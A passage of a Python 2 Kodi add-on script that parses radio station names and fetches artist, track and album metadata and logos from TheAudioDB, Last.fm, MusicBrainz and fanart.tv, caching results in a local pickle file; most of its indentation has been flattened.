addon.getSetting('st2rep').strip(): addon.getSetting('url2'), \
addon.getSetting('st3rep').strip(): addon.getSetting('url3'), \
addon.getSetting('st4rep').strip(): addon.getSetting('url4'), \
addon.getSetting('st5rep').strip(): addon.getSetting('url5'), \
addon.getSetting('st6rep').strip(): addon.getSetting('url6'), \
addon.getSetting('st7rep').strip(): addon.getSetting('url7'), \
addon.getSetting('st8rep').strip(): addon.getSetting('url8'), \
addon.getSetting('st9rep').strip(): addon.getSetting('url9'), \
addon.getSetting('st10rep').strip(): addon.getSetting('url10')}
replace1 = addon.getSetting('remove1').decode('utf-8')
replace2 = addon.getSetting('remove2').decode('utf-8')
replace3 = addon.getSetting('remove3').decode('utf-8')
luma = (addon.getSetting('luma') == 'true')
firstpass = 0
delay = int(addon.getSetting('delay'))
previous_track = None
already_checked = False
checked_all_artists = False
mbid = None
WINDOW = xbmcgui.Window(12006)
debugging = (addon.getSetting('debug') == 'true')
def log(txt, mylevel=xbmc.LOGDEBUG):
"""
Logs to Kodi's standard logfile
"""
if debugging:
mylevel = xbmc.LOGNOTICE
if isinstance(txt, str):
txt = txt.decode('utf-8')
message = u'%s : %s' % (addonname, txt)
xbmc.log(msg=message.encode('utf-8'), level=mylevel)
def download_logo(path,url,origin="Fanart.tv"):
logopath = path + "logo.png"
log ("Download logo [%s] " % logopath)
imagedata = urllib.urlopen(url).read()
f = open(logopath, 'wb')
f.write(imagedata)
f.close()
log("Downloaded logo from %s" % origin, xbmc.LOGDEBUG)
return logopath
def load_artist_subs():
    artist_subs_string = addon.getSetting('artistsubs')
    temp_list = artist_subs_string.split(',')
    # guard against an empty or malformed setting - only entries containing '=' are usable
    artist_sub_dict = dict(s.split('=', 1) for s in temp_list if '=' in s)
    return artist_sub_dict
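# Illustrative only (hypothetical setting value): load_artist_subs() expects
# 'artistsubs' to hold comma-separated 'find=replace' pairs, e.g.
#   "Beatles=The Beatles,Stones=The Rolling Stones"
# which parses to {'Beatles': 'The Beatles', 'Stones': 'The Rolling Stones'}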
def clean_string(text):
text = re.sub('<a [^>]*>|</a>|<span[^>]*>|</span>', '', text)
    text = re.sub('&quot;', '"', text)
    text = re.sub('&amp;', '&', text)
    text = re.sub('&gt;', '>', text)
    text = re.sub('&lt;', '<', text)
text = re.sub('User-contributed text is available under the Creative Commons By-SA License; additional terms may apply.', '', text)
text = re.sub('Read more about .* on Last.fm.', '', text)
text = re.sub('Read more on Last.fm.', '', text)
return text
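# Illustrative only (hypothetical input): clean_string() strips anchor/span
# markup and last.fm boilerplate, e.g.
#   '<a href="x">AC/DC</a> are a rock band. Read more on Last.fm.'
# comes back as 'AC/DC are a rock band. '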
def load_pickle():
"""
Loads cache data from file in the addon_data directory of the script
"""
log("----------------------------------------------------", xbmc.LOGDEBUG)
log(" Entered routine 'load_pickle' ", xbmc.LOGDEBUG)
log("----------------------------------------------------", xbmc.LOGDEBUG)
log("Loading data from pickle file")
pfile = open(logostring + 'data.pickle',"rb")
d1 = pickle.load(pfile)
d2 = pickle.load(pfile)
d3 = pickle.load(pfile)
try:
d4 = pickle.load(pfile)
d5 = pickle.load(pfile)
except:
d4 = {}
d5 = {}
log("Pickle data for thumb and banner art didn't exist. Creating new dictionaries")
try:
d6 = pickle.load(pfile)
except:
d6 = {}
log("created new pickle data for MBID storage")
try:
d7 = pickle.load(pfile)
except:
d7 = {}
log("Created new pickle data for track information")
try:
d8 = pickle.load(pfile)
d9 = pickle.load(pfile)
d10 = pickle.load(pfile)
d11 = pickle.load(pfile)
d12 = pickle.load(pfile)
except:
d8 = {}
d9 = {}
d10 = {}
d11 = {}
d12 = {}
log("New pickle data created for album information")
pfile.close()
return d1, d2, d3, d4, d5, d6, d7, d8, d9, d10, d11, d12
def save_pickle(d1, d2, d3, d4, d5, d6, d7, d8, d9, d10, d11, d12, counts):
"""
Saves local cache data to file in the addon_data directory of the script
"""
log("----------------------------------------------------", xbmc.LOGDEBUG)
log(" Entered routine 'save_pickle' ", xbmc.LOGDEBUG)
log("----------------------------------------------------", xbmc.LOGDEBUG)
log("Saving data to pickle file")
counts['no_of_tracks'] += len(d7)
pfile = open(logostring + 'data.pickle',"wb")
pickle.dump(d1, pfile)
pickle.dump(d2, pfile)
pickle.dump(d3, pfile)
pickle.dump(d4, pfile)
pickle.dump(d5, pfile)
pickle.dump(d6, pfile)
pickle.dump(d7, pfile)
pickle.dump(d8, pfile)
pickle.dump(d9, pfile)
pickle.dump(d10, pfile)
pickle.dump(d11, pfile)
pickle.dump(d12, pfile)
pfile.close()
def load_url(url):
try:
response = urllib.urlopen(url).read().decode('utf-8')
if response is None:
response = "!DOCTYPE"
return response
    except IOError as e:
        if hasattr(e, 'reason'):
            log("Failed to reach server with url [%s]" % url, xbmc.LOGERROR)
            log("Error returned was [%s]" % e.reason, xbmc.LOGERROR)
        elif hasattr(e, 'code'):
            log("Error getting url [%s] Error code was [%s]" % (url, e.code), xbmc.LOGERROR)
        # 'response' is undefined when urlopen failed, so return the same
        # '!DOCTYPE' sentinel the callers already check for
        return "!DOCTYPE"
def get_local_cover(BaseString, artist, track, albumtitle):
pathToCDArt = ""
try:
if albumtitle:
pathToCDArt = xbmc.validatePath(BaseString + artist + "/" + albumtitle + "/cdart.png" )
if not xbmcvfs.exists( pathToCDArt ):
pathToCDArt = ""
pathToAlbumCover = xbmc.validatePath(BaseString + artist + "/" + albumtitle + "/cover.png")
log("Looking for an album cover in %s" % pathToAlbumCover, xbmc.LOGDEBUG)
if xbmcvfs.exists(pathToAlbumCover):
log("Found a local 'cover.png' and set AlbumCover to [%s]" % pathToAlbumCover, xbmc.LOGDEBUG)
return 1, pathToAlbumCover, pathToCDArt
pathToAlbumCover = xbmc.validatePath(BaseString + artist + "/" + albumtitle + "/folder.jpg")
log("Looking for an album cover in %s" % pathToAlbumCover, xbmc.LOGDEBUG)
if xbmcvfs.exists(pathToAlbumCover):
log("Found a local 'folder.jpg' and set AlbumCover to [%s]" % pathToAlbumCover, xbmc.LOGDEBUG)
return 1, pathToAlbumCover, pathToCDArt
pathToAlbumCover = xbmc.validatePath(BaseString + artist + "/" + track + "/folder.jpg")
pathToCDArt = xbmc.validatePath(BaseString + artist + "/" + track + "/cdart.png" )
if not xbmcvfs.exists( pathToCDArt ):
pathToCDArt = ""
if xbmcvfs.exists(pathToAlbumCover):
log("Found a local 'folder.jpg' and set AlbumCover to [%s]" % pathToAlbumCover, xbmc.LOGDEBUG)
return 1, pathToAlbumCover, pathToCDArt
pathToAlbumCover = xbmc.validatePath(BaseString + artist + "/" + track + "/cover.png")
log("Looking for an album cover in %s (last attempt before using thumbnail)" % pathToAlbumCover, xbmc.LOGDEBUG)
if xbmcvfs.exists(pathToAlbumCover):
log("Found a local 'cover.png' and set AlbumCover to [%s]" % pathToAlbumCover, xbmc.LOGDEBUG)
return 1, pathToAlbumCover, pathToCDArt
if artist in dict4:
return 2, dict4[artist], None
return 0, None, None
    except Exception as e:
        log("Got an error trying to look for a cover!! [%s]" % str(e), xbmc.LOGERROR)
    return 0, None, None # keep the (status, cover, cdart) return shape consistent for callers
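# Return contract of get_local_cover (inferred from its callers):
#   (1, cover_path, cdart_path_or_empty) - local art was found
#   (2, cached_thumb_url, None)          - only a cached artist thumb exists
#   (0, None, None)                      - nothing was found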
def check_station(file_playing):
"""Attempts to parse a URL to find the name of the station being played
and performs substitutions to 'pretty up' the name if those options
    are set in the settings.
    NOTE - Kodi v18 doesn't return the url of the station; instead it returns either
    the name of the file containing the url, or a station ID if using the rad.io addon
    """
    station = 'Online Radio' # fallback if nothing below manages to parse a name
    station_list = ''
try:
if 'icy-' in file_playing: # looking at an ICY stream
x = file_playing.rfind('/')
station_list = file_playing[x + 1:]
if ('.' in station_list) and ("http" not in station_list):
station, ending = station_list.split('.')
elif '|' in file_playing:
y = file_playing.rfind('|')
station_list = file_playing[:y]
x = station_list.rfind('/')
station = station_list[x + 1:]
else:
            # str.strip() removes a *character set*, not a prefix, so slice the
            # URL scheme off instead
            for scheme in ('http://', 'https://', 'smb://'):
                if file_playing.startswith(scheme):
                    station_list = file_playing[len(scheme):]
                    break
x = station_list.rfind(':')
if x != -1:
station = station_list[:x]
else:
station = station_list
if not station_list: # If this is empty we haven't found anything to use as a station name yet
if 'm3u' in file_playing: # Sometimes kodi makes a playlist of one streaming channel so check for this
station_list = file_playing.replace( '.m3u', '')
else:
station_list = file_playing # just use whatever we have (rad.io addon filename will be the ID of the station (11524 for planet rock)
try:
            station = next(v for k, v in replacelist.items()
                           if k and k in station_list) # skip empty 'find' settings
log("Station is [%s], station_list is [%s]" %(station, station_list), xbmc.LOGDEBUG)
return station, station_list
except StopIteration:
return station, station_list
except Exception as e:
log("Error trying to parse station name [ %s ]" % str(
e), xbmc.LOGERROR)
return 'Online Radio', file_playing
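# Illustrative only (hypothetical URL, assuming no 'find' setting matches):
#   check_station('http://stream.example.com:8000/planetrock')
# would typically return ('stream.example.com', 'stream.example.com:8000/planetrock')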
def get_album_data(artist, track, albumtitle, dict8, dict9, dict10, dict11, dict12, RealCDArt, RealAlbumThumb, AlbumDescription, AlbumReview):
log("----------------------------------------------------", xbmc.LOGDEBUG)
log(" Entered routine 'get_album_data' ", xbmc.LOGDEBUG)
log("----------------------------------------------------", xbmc.LOGDEBUG)
tadb_url = 'https://www.theaudiodb.com/api/v1/json/%s' % rusty_gate.decode( 'base64' )
tadb_url = tadb_url + '/searchalbum.php?s=%s&a=%s' % (artist.encode('utf-8'), albumtitle.encode('utf-8'))
log(tadb_url)
albumkeydata = albumtitle.replace(' ', '').lower()
num = len(dict8)
log("%d albums in cache" % num)
    keydata = artist.replace(" ", "").lower() + track.replace(" ", "").lower()
    try:
        datechecked = dict3[keydata]
    except KeyError:
        datechecked = (todays_date - time_diff)
if albumkeydata in dict8:
log("Seen this album before")
if not ((datechecked < (todays_date - time_diff)) or (xbmcvfs.exists(logostring + "refreshdata"))): # might need to look up data again
WINDOW.setProperty("srh.RecordLabel", dict8[albumkeydata])
RealAlbumThumb = dict9[albumkeydata]
RealCDArt = dict10[albumkeydata]
AlbumDescription = dict11[albumkeydata]
AlbumReview = dict12[albumkeydata]
if RealAlbumThumb:
log("real album thumb found! path is %s" % RealAlbumThumb)
if RealCDArt:
log("Real cd art found! path is %s" % RealCDArt)
return RealAlbumThumb, RealCDArt, AlbumDescription, AlbumReview
else:
log("Refreshing album data (treating as new album)")
else: # Album not in cache yet.
log("New album - looking up data")
try:
response = urllib.urlopen(tadb_url).read().decode('utf-8')
if response:
tadb_album_data = _json.loads(response)
else:
dict8[albumkeydata] = None
dict9[albumkeydata] = None
dict10[albumkeydata] = None
dict11[albumkeydata] = None
dict12[albumkeydata] = None
log("No response from tadb", xbmc.LOGERROR)
return None, None, None, None
        except Exception as e:
            log("Error trying to get album data [%s]" % str(e), xbmc.LOGERROR)
            return None, None, None, None # tadb_album_data is undefined past this point
try:
RecordLabel = tadb_album_data['album'][0]['strLabel']
dict8[albumkeydata] = RecordLabel
except Exception as e:
log("Couldn't get required data !!")
log("Error was %s" % str(e))
dict8[albumkeydata] = None
pass
try:
RealAlbumThumb = tadb_album_data['album'][0]['strAlbumThumb']
dict9[albumkeydata] = RealAlbumThumb
except:
RealAlbumThumb = None
dict9[albumkeydata] = None
pass
try:
RealCDArt = tadb_album_data['album'][0]['strAlbumCDart']
dict10[albumkeydata] = RealCDArt
except:
RealCDArt = None
dict10[albumkeydata] = None
pass
try:
        AlbumDescription = tadb_album_data['album'][0]['strDescriptionEN']
dict11[albumkeydata] = AlbumDescription.encode( 'utf-8' )
except:
AlbumDescription = None
dict11[albumkeydata] = None
pass
try:
        AlbumReview = tadb_album_data['album'][0]['strReview']
dict12[albumkeydata] = AlbumReview.encode( 'utf-8' )
except:
AlbumReview = None
dict12[albumkeydata] = None
try:
WINDOW.setProperty("srh.RecordLabel",dict8[albumkeydata])
log("record label set to [%s]" % dict8[albumkeydata])
except:
WINDOW.setProperty("srh.RecordLabel","")
log("No record label found for this album")
pass
if AlbumDescription:
log("Album Description - %s" % AlbumDescription.encode('utf-8'))
if AlbumReview:
log("Album Review - %s" %AlbumReview.encode('utf-8'))
if RealAlbumThumb:
log("real album thumb found! path is %s" % RealAlbumThumb)
if RealCDArt:
log("Real cd art found! path is %s" % RealCDArt)
albumdatasize = len(dict8)
log("Album data cache is size %d" % albumdatasize)
return RealAlbumThumb, RealCDArt, AlbumDescription, AlbumReview
def get_year(artist, track, dict1, dict2, dict3, dict7, already_checked, counts):
"""
Look in local cache for album and year data corresponding to current track and artist.
Return the local data if present, unless it is older than 7 days in which case re-lookup online.
If data not present in cache, lookup online and add to cache
If all data present in cache, just return that and don't lookup anything online.
"""
log("----------------------------------------------------", xbmc.LOGDEBUG)
log(" Entered routine 'get_year' ", xbmc.LOGDEBUG)
log("----------------------------------------------------", xbmc.LOGDEBUG)
lun = False
if (artist == "") and (track == ""):
        return True, None, None, None
log("Looking up album and year data for artist %s and track %s" %(artist, track), xbmc.LOGDEBUG)
my_size = len(dict1)
log("Cache currently holds %d tracks" % my_size, xbmc.LOGDEBUG)
keydata = artist.replace(" ","").lower() + track.replace(" ","").lower()
log("keydata is %s" % keydata, xbmc.LOGDEBUG)
    if keydata in dict1 and not already_checked:
log("Track %s in local data cache" % track, xbmc.LOGDEBUG)
albumname = dict1[keydata]
log("Album Name is %s" % albumname, xbmc.LOGDEBUG)
datechecked = dict3[keydata]
try:
trackinfo = dict7[keydata]
log("Track info is [%s]" % trackinfo, xbmc.LOGDEBUG)
except Exception as e:
log("Updating info for track [%s]" % track, xbmc.LOGDEBUG)
lun = True
dict1[keydata], dict2[keydata], dict7[keydata] = tadb_trackdata(artist, track, dict1, dict2, dict3, dict7, counts)
dict3[keydata] = datetime.datetime.combine(datetime.date.today(), datetime.datetime.min.time())
log("Data for track '%s' on album '%s' last checked %s" % (track, dict1[keydata], str(datechecked.strftime("%d-%m-%Y"))), xbmc.LOGDEBUG)
if (datechecked < (todays_date - time_diff)) or (xbmcvfs.exists(logostring + "refreshdata")):
log( "Data might need refreshing", xbmc.LOGDEBUG)
            if (dict1[keydata] in ('', None, 'None', 'null') or xbmcvfs.exists(logostring + "refreshdata")) and not lun:
log("No album data - checking TADB again [%s]" % lun, xbmc.LOGDEBUG)
dict1[keydata], dict2[keydata], dict7[keydata] = tadb_trackdata(artist, track, dict1, dict2, dict3, dict7, counts)
dict3[keydata] = datetime.datetime.combine(datetime.date.today(),datetime.datetime.min.time())
log("Data refreshed")
            elif dict2[keydata] in (None, '0', '') and not lun:
log("No year data for album %s - checking TADB again [%s]" % (dict1[keydata], lun), xbmc.LOGDEBUG)
dict1[keydata], dict2[keydata], dict7[keydata] = tadb_trackdata(artist, track, dict1, dict2, dict3, dict7, counts)
dict3[keydata] = datetime.datetime.combine(datetime.date.today(),datetime.datetime.min.time())
log("Data refreshed", xbmc.LOGDEBUG)
            elif dict7[keydata] in (None, "None", "") and not lun: # don't lookup again if we have just done it
log("No text data for track - re-checking TADB [%s]" % lun, xbmc.LOGDEBUG)
dict1[keydata], dict2[keydata], dict7[keydata] = tadb_trackdata(artist,track,dict1,dict2,dict3, dict7, counts)
dict3[keydata] = datetime.datetime.combine(datetime.date.today(),datetime.datetime.min.time())
            elif lun:
log("Track data just looked up. No need to refresh other data right now!", xbmc.LOGDEBUG)
else:
log( "All data present - No need to refresh", xbmc.LOGDEBUG)
return True, dict1[keydata], dict2[keydata], dict7[keydata]
else:
log( "Using cached data", xbmc.LOGDEBUG )
return True, dict1[keydata],dict2[keydata], dict7[keydata]
    elif not already_checked:
log("New track - get data for %s : %s" %(artist, track), xbmc.LOGDEBUG)
dict1[keydata], dict2[keydata], dict7[keydata] = tadb_trackdata(artist,track,dict1,dict2,dict3, dict7, counts)
dict3[keydata] = datetime.datetime.combine(datetime.date.today(),datetime.datetime.min.time())
log( "New data has been cached", xbmc.LOGDEBUG)
return True, dict1[keydata], dict2[keydata], dict7[keydata]
def tadb_trackdata(artist,track,dict1,dict2,dict3, dict7, counts):
"""
    Searches theaudiodb for an album containing the track. If an album is found, attempts
    to get the year of the album. Returns the album name and year if both are found, just the
    album name if no year is found, or None if nothing is found
"""
log("----------------------------------------------------", xbmc.LOGDEBUG)
log(" Entered routine 'tadb_trackdata' ", xbmc.LOGDEBUG)
log("----------------------------------------------------", xbmc.LOGDEBUG)
trackinfo = None
searchartist = artist.replace(" ","+").encode('utf-8')
searchtrack = track.replace(" ","+").encode('utf-8')
searchtrack = searchtrack.replace("&","and")
searchtrack = searchtrack.rstrip("+")
if "(Radio Edit)" in searchtrack:
searchtrack = searchtrack.replace("(Radio Edit)","").strip() # remove 'radio edit' from track name
if "(Live)" in searchtrack:
searchtrack = searchtrack.replace("(Live)","").strip()
if "(live" in searchtrack:
searchtrack = searchtrack.replace("(live", "").replace(")", "").strip()
if "+&+" in searchtrack:
searchtrack = searchtrack.replace("+&+"," and ").strip()
url = 'https://www.theaudiodb.com/api/v1/json/%s' % rusty_gate.decode( 'base64' )
searchurl = url + '/searchtrack.php?s=' + searchartist + '&t=' + searchtrack
log("Search artist, track with strings : %s,%s" %(searchartist,searchtrack), xbmc.LOGDEBUG)
keydata = artist.replace(" ","").lower() + track.replace(" ","").lower()
if keydata in dict1: # seen this artist/track before
if keydata in dict7: # already possibly have some track info
if dict7[keydata] is not None:
log("Using cached data & not looking anything up online", xbmc.LOGDEBUG)
return dict1[keydata], dict2[keydata], dict7[keydata]
try:
try:
            response = load_url(searchurl)
            if response:
                searching = _json.loads(response)
            else:
                searching = [] # no usable response - behave as if nothing was found
        except ValueError:
            log("No json data to parse !!", xbmc.LOGERROR)
            searching = []
try:
album_title = searching['track'][0]['strAlbum']
except:
album_title = None
pass
try:
tadb_albumid = searching['track'][0]['idAlbum']
except:
tadb_albumid = None
pass
trackinfo = None
try:
trackinfo = searching['track'][0]['strDescriptionEN']
except:
trackinfo = None
log('No track info from TADB', xbmc.LOGDEBUG)
pass
        if (trackinfo is not None) and (len(trackinfo) > 3):
dict7[keydata] = trackinfo
else:
trackinfo = None
log("Not found any track data so far, continuing search on lastFM", xbmc.LOGDEBUG)
if trackinfo is None :
lastfmurl = "http://ws.audioscrobbler.com/2.0/?method=track.getInfo&api_key=%s" % happy_hippo.decode( 'base64' )
lastfmurl = lastfmurl+'&artist='+searchartist+'&track='+searchtrack+'&format=json'
log("LastFM url is [%s] " % lastfmurl, xbmc.LOGDEBUG)
try:
response = load_url(lastfmurl)
stuff = _json.loads(response)
searching = stuff['track']
log("Searching from last.fm is [%s]" % searching)
except Exception as e:
searching = [] # no track info from last.fm
pass
if 'wiki' in searching:
try:
trackinfo = searching['wiki']['content']
except:
pass
try:
trackinfo = searching['wiki']['summary']
except:
pass
if trackinfo:
trackinfo = clean_string(trackinfo)
log("Trackinfo - [%s]" % trackinfo, xbmc.LOGDEBUG)
if trackinfo is not None and len(trackinfo) < 3:
log ("No track info found", xbmc.LOGDEBUG)
trackinfo = None
else:
log("No track info found on lastFM", xbmc.LOGDEBUG)
if trackinfo:
counts['new_track_info'] += 1
if keydata:
dict7[keydata] = trackinfo
        if album_title in ("", "null", None):
log("No album data found on TADB ", xbmc.LOGDEBUG)
log("trying to use LastFM data", xbmc.LOGDEBUG)
try:
if searching:
album_title = searching['album']['title']
log("Album title [%s]" % album_title, xbmc.LOGDEBUG)
except Exception as e:
album_title = None
log("No album title", xbmc.LOGDEBUG)
pass
if album_title is not None:
album_title_search = album_title.replace(" ","+").encode('utf-8')
searchurl = url + '/searchalbum.php?s=' + searchartist + '&a=' + album_title_search
log("Search artist,album with strings : %s,%s" %(searchartist,album_title_search), xbmc.LOGDEBUG)
response = load_url(searchurl)
try:
searching = _json.loads(response)
the_year = "null"
except ValueError:
log("No JSON from TADB - Site down ??", xbmc.LOGERROR)
searching = []
the_year = "null"
try:
the_year = searching['album'][0]['intYearReleased']
except:
pass
            if the_year in ("", "null"):
                log("No year found for album", xbmc.LOGDEBUG)
                return album_title, None, dict7.get(keydata)
log("Got '%s' as the year for '%s'" % ( the_year, album_title), xbmc.LOGDEBUG)
log("keydata is set to %s " % keydata, xbmc.LOGDEBUG)
            return album_title, the_year, dict7.get(keydata)
        else:
            log("No album title to use as lookup - returning Null values")
            return None, None, dict7.get(keydata)
except IOError:
log("Timeout connecting to TADB", xbmc.LOGERROR)
if keydata in dict1 and keydata in dict7:
return dict1[keydata], dict2[keydata], dict7[keydata]
elif keydata in dict1 and keydata not in dict7:
return dict1[keydata], dict2[keydata], None
else:
return None, None, None
except Exception as e:
log("Error searching theaudiodb for album and year data [ %s ]" % str(e), xbmc.LOGERROR)
exc_type, exc_value, exc_traceback = sys.exc_info()
log(repr(traceback.format_exception(exc_type, exc_value,exc_traceback)), xbmc.LOGERROR)
if keydata in dict1 and keydata in dict7:
return dict1[keydata], dict2[keydata], dict7[keydata]
elif keydata in dict1:
return dict1[keydata], dict2[keydata], None
else:
return None, None, None
def get_mbid(artist, track, dict6, dict3, counts):
"""
Gets the MBID for a given artist name.
Note that radio stations often omit 'The' from band names so this may return the wrong MBID
Returns the Artist MBID or a self generated one if the lookup fails and we haven't cached one previously
"""
log("----------------------------------------------------", xbmc.LOGDEBUG)
log(" Entered routine 'get_mbid' ", xbmc.LOGDEBUG)
log("----------------------------------------------------", xbmc.LOGDEBUG)
log("Getting mbid for artist %s " % artist, xbmc.LOGDEBUG)
em_mbid = str(uuid.uuid5(uuid.NAMESPACE_DNS, artist.encode('utf-8'))) # generate an emergency mbid in case lookup fails
keydata = artist.replace(" ","").lower() + track.replace(" ","").lower()
try:
try:
datechecked = dict3[keydata]
except: # no keydata (new artist/track combo probably) still might have artist mbid cached
datechecked = todays_date # set date to today (use cached mbid if there is one)
if not ((datechecked < (todays_date - time_diff)) or (xbmcvfs.exists(logostring + "refreshdata"))):
if artist in dict6:
log("Using cached MBID for artist [%s]" % artist, xbmc.LOGDEBUG)
return dict6[artist]
xbmc.sleep(500) # wait a little to avoid hitting musicbrainz too heavily
url = 'https://musicbrainz.org/ws/2/artist/?query=artist:%s&fmt=json' % urllib.quote(artist.encode('utf-8'))
# 'https://musicbrainz.org/ws/2/artist/?query=artist:%s' % temp_artist
response = urllib.urlopen(url).read()
if (response == '') or ("MusicBrainz web server" in response):
log("Unable to contact Musicbrainz to get an MBID", xbmc.LOGERROR)
log("using %s as emergency MBID" % em_mbid)
return em_mbid
mb_data = _json.loads(response)
artist_name = mb_data['artists'][0]['name']
score = mb_data['artists'][0]['score']
        if score > 95:
            mbid = mb_data['artists'][0]['id']
        else:
            mbid = '' # low-confidence match - fall through to the emergency MBID below
        log('Got an MBID of : %s' % mbid, xbmc.LOGDEBUG)
if mbid == '':
log("Didn't get an MBID for artist : %s" % artist, xbmc.LOGDEBUG)
log("using %s as emergency MBID" % em_mbid)
return em_mbid
if artist not in dict6:
log("Caching mbid [%s] for artist [%s]" %(mbid, artist), xbmc.LOGDEBUG)
dict6[artist] = mbid
counts['new_artists'] += 1
elif (artist in dict6 and mbid != dict6[artist]):
dict6[artist] = mbid
return mbid
except Exception as e:
log ("There was an error getting the Musicbrainz ID [ %s ]" % str(e), xbmc.LOGERROR)
exc_type, exc_value, exc_traceback = sys.exc_info()
log(repr(traceback.format_exception(exc_type, exc_value,exc_traceback)), xbmc.LOGERROR)
return em_mbid
def check_cached_logo(logopath, url):
if (not xbmcvfs.exists(logopath)) and url:
xbmcvfs.mkdir(logopath)
log("Created directory [%s] to download logo from [%s]" %( logopath, url), xbmc.LOGDEBUG)
logopath = download_logo(logopath, url, "tadb")
return logopath
else:
logopath = logopath + 'logo.png'
logopath = xbmc.validatePath(logopath)
if xbmcvfs.exists(logopath):
log("Logo has already been downloaded and is in cache. Path is %s" % logopath, xbmc.LOGDEBUG)
return logopath
else:
log("No local logo and no cached logo", xbmc.LOGDEBUG)
return None
def get_hdlogo(mbid, artist):
"""
Get the first found HD clearlogo from fanart.tv if it exists.
Args:
The MBID of the artist and the artist name
Returns :
The fully qualified path to an existing logo or newly downloaded logo or
None if the logo is not found
"""
log("----------------------------------------------------", xbmc.LOGDEBUG)
log(" Entered routine 'get_hdlogo' ", xbmc.LOGDEBUG)
log("----------------------------------------------------", xbmc.LOGDEBUG)
try:
        if not checked_all_artists:
url = "https://fanart.tv/artist/" + mbid
logopath = logostring + mbid + "/logo.png"
logopath = xbmc.validatePath(logopath)
if not xbmcvfs.exists(logopath):
log("Searching for HD logo on fanart.tv", xbmc.LOGDEBUG)
response = urllib.urlopen(url).read()
if response == '':
log("No response from fanart.tv", xbmc.LOGDEBUG)
return None
index1 = response.find("<h2>HD ClearLOGO<div")
if index1 != -1:
index2 = response.find('<div class="image_options">',index1)
anylogos = response[index1:index2]
if "currently no images" in anylogos:
log("No HD logos found for %s" % artist, xbmc.LOGDEBUG)
return None
index3= response.find('<a href="/api/download.php?type=download')
index4 = response.find('class="btn btn-inverse download"')
chop = response[index3+9:index4-2]
url = "https://fanart.tv" + chop
logopath = logostring + mbid + '/'
                    logopath = xbmc.validatePath(logopath)
xbmcvfs.mkdir(logopath)
logopath = download_logo(logopath,url)
return logopath
else:
logopath = logostring + mbid + '/logo.png'
logopath = xbmc.validatePath(logopath)
if xbmcvfs.exists(logopath):
log("Logo downloaded previously", xbmc.LOGDEBUG)
return logopath
else:
log("No logo found on fanart.tv", xbmc.LOGDEBUG)
return None
else:
logopath = logostring + mbid + '/logo.png'
logopath = xbmc.validatePath(logopath)
if xbmcvfs.exists(logopath):
log("Logo downloaded previously", xbmc.LOGDEBUG)
return logopath
else:
log("No logo in cache for %s " % artist, xbmc.LOGDEBUG)
return None
except:
log("Error searching fanart.tv for a logo", xbmc.LOGERROR)
exc_type, exc_value, exc_traceback = sys.exc_info()
log(repr(traceback.format_exception(exc_type, exc_value,exc_traceback)), xbmc.LOGERROR)
return None
def search_tadb(local_logo, mbid, artist, dict4, dict5, checked_all_artists):
"""
Checks to see if there is an existing logo locally in the scripts addon_data directory.
If not, attempts to find a logo on theaudiodb and download it into the cache. As radio stations often
drop 'The' from band names (eg 'Who' for 'The Who', 'Kinks' for 'The Kinks') if we fail to find a match
for the artist we try again with 'The ' in front of the artist name
Finally we do a search with the MBID we previously obtained
Args:
mbid - the mbid from musicbrainz
artist - name of the artist to search for
        dict4 - dictionary of artist thumbnail URLs
        dict5 - dictionary of artist banner URLs
returns:
artist - artist name
logopath - full path to downloaded logo
        URL1 - URL to artist thumb on TADB
        URL2 - URL to artist banner on TADB
"""
log("----------------------------------------------------", xbmc.LOGDEBUG)
log(" Entered routine 'search_tadb' ", xbmc.LOGDEBUG)
log("----------------------------------------------------", xbmc.LOGDEBUG)
logopath = ''
url = ''
response = None
log("Looking up %s on tadb.com" % artist, xbmc.LOGDEBUG)
searchartist = artist.replace( " ", "+" )
log ("[search_tadb] : searchartist = %s" % searchartist)
tadburl = 'https://www.theaudiodb.com/api/v1/json/%s' % rusty_gate.decode( 'base64' )
searchurl = tadburl + '/search.php?s=' + (searchartist.encode('utf-8'))
log("URL for TADB is : %s" % searchurl, xbmc.LOGDEBUG)
response = load_url(searchurl)
log(str(response))
    if (response is None) or (response == '') or (response == '{"artists":null}') or ('!DOCTYPE' in response):
searchartist = 'The+' + searchartist
tadburl = 'https://www.theaudiodb.com/api/v1/json/%s' % rusty_gate.decode( 'base64' )
searchurl = tadburl + '/search.php?s=' + (searchartist.encode('utf-8'))
log("Looking up %s on tadb.com with URL %s" % (searchartist, searchurl), xbmc.LOGDEBUG)
response = load_url(searchurl)
log(response, xbmc.LOGDEBUG)
        if (response is None) or (response == '') or (response == '{"artists":null}') or ('!DOCTYPE' in response):
log("Artist not found on tadb", xbmc.LOGDEBUG)
# Lookup failed on name - try with MBID
log("Looking up with MBID", xbmc.LOGDEBUG)
tadburl = 'https://www.theaudiodb.com/api/v1/json/%s' % rusty_gate.decode( 'base64' )
searchurl = tadburl + '/artist-mb.php?i=' + mbid
log("MBID URL is : %s" % searchurl, xbmc.LOGDEBUG)
response = load_url(searchurl)
if not response:
log("Failed to find any artist info on theaudiodb", xbmc.LOGDEBUG)
return artist, None, None, None
if response is not None:
searching = _json.loads(response)
artist, url, dict4, dict5, mbid = parse_data(artist, searching, searchartist, dict4, dict5, mbid)
        if url and (not local_logo):
            log("No local logo", xbmc.LOGDEBUG)
        # both branches resolved the cache path the same way, so do it once
        logopath = logostring + mbid + '/'
        logopath = xbmc.validatePath(logopath)
        logopath = check_cached_logo(logopath, url)
if searchartist in dict4:
return artist, logopath, dict4[searchartist], dict5[searchartist]
else:
return artist, logopath, None, None
def parse_data(artist, searching, searchartist, dict4, dict5, mbid):
"""
Parse the JSON data for the values we want
Also checks the artist name is correct if the first two lookups on TADB failed
and corrects it if possible
"""
log("----------------------------------------------------", xbmc.LOGDEBUG)
log(" Entered routine 'parse_data' ", xbmc.LOGDEBUG)
log("----------------------------------------------------", xbmc.LOGDEBUG)
checkartist = ''
try:
try:
if searching['artists'][0]['strArtist']:
checkartist = searching['artists'][0]['strArtist']
except:
log("No artist found on tadb for %s. JSON data is %s" % ( artist, searching), xbmc.LOGDEBUG)
log("checkartist is [%s], searchartist is [%s], artist is [%s]" %(checkartist, searchartist, artist), xbmc.LOGDEBUG)
if (checkartist.replace(' ','+') != searchartist) and (artist !="P!nk"):
if checkartist != '':
log("Updated artist name (%s) with data from tadb [%s]" % (artist, checkartist), xbmc.LOGDEBUG)
artist = checkartist
try:
_artist_thumb = searching['artists'][0]['strArtistThumb']
except:
log("error getting artist thumb", xbmc.LOGDEBUG)
_artist_thumb = None
pass
try:
_artist_banner = searching['artists'][0]['strArtistBanner']
except:
log("error getting artist banner", xbmc.LOGDEBUG)
_artist_banner = None
pass
